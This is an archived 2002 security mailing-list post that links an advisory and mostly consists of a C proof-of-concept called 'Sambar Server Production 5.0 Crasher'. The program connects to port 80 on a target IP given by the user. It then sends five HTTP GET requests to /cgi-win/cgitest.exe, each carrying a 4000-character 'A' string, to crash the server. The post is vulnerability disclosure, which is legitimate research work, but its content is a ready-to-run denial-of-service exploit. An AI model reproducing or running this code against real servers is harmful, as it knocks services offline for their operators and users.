OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Tamer Sahin (tssecurityoffice.net)
Date: Tue Jan 01 2002 - 15:51:33 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Orginal Advisory: http://www.securityoffice.net/articles/sambar/

    - ------------------<snip>----------------------------------------------
    - ----------------------------------------
    /*********************************************************************
    **********
    **
    ** 06.02.2002 - GREETZ TO WbC-BoArD & YAST CREW
            
    **
    ** Compiled with gcc under linux with kernel 2.4.17
            
    **
    ** Programname: Sambar Server 5.0 Manufacturer:Jalyn
            
    **
    **********************************************************************
    *********/

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    #define SERVER_PORT 80
    #define MAX_MSG 100
        
      int sd, rc, i,j;
      char buf[5000];
      char msgtosnd[5024];
      char msgtoget[102400];
      char source[200000];
      struct sockaddr_in localAddr, servAddr;
      struct hostent *h;
      FILE *f1;
      
    int main (int argc, char *argv[]) {
    printf("Sleepy of Yast presents \"Sambar Server Production 5.0
    Crasher\"\n");
    if(argc != 2)
    {
    printf(">>> usage: %s <ip>",argv[0]);exit(0);
    };
    h = gethostbyname(argv[1]);
    if(h==NULL)
    {
    printf("%s: unknown host '%s'\n",argv[0],argv[1]);
    exit(1);
    }
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
    h->h_length);
    servAddr.sin_port = htons(SERVER_PORT);
    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0)
    {
    perror("cannot open socket ");
    exit(1);
    }

    localAddr.sin_family = AF_INET;
    localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
    localAddr.sin_port = htons(0);
    rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));

    if(rc<0)
    {
    printf("%s: cannot bind port TCP %u\n",argv[0],SERVER_PORT);
    perror("error ");
    exit(1);
    }
    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
    if(rc<0)
    {
    perror("cannot connect ");
    exit(1);
    };
    strcpy(buf,"A");
    fprintf(stderr,"Entering Loop\n");
    for(i=1;i<4000;i++)
    {
    strcat(buf,"A");
    }
    sprintf(msgtosnd,"GET /cgi-win/cgitest.exe?%s HTTP/1.1\nhost:
    localhost\n\n\n",buf);
    for(j=0;j<5;j++)
    {
    send(sd,msgtosnd,5024,0);
    }
    printf("\n\n BOOOOM");
    }
    - ------------------<snap>----------------------------------------------
    - ---------------------------------------

    Tamer Sahin
    http://www.securityoffice.net
    PGP Key ID: 0x2B5EDCB0

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.1

    iQA/AwUBPDIvZLuLpFMrXtywEQLPTQCghjA86aQNKMKYiTdJ/wkade1dZPoAn35c
    bqGIVJG8SKE8tc5cZXcPs+i6
    =5ywY
    -----END PGP SIGNATURE-----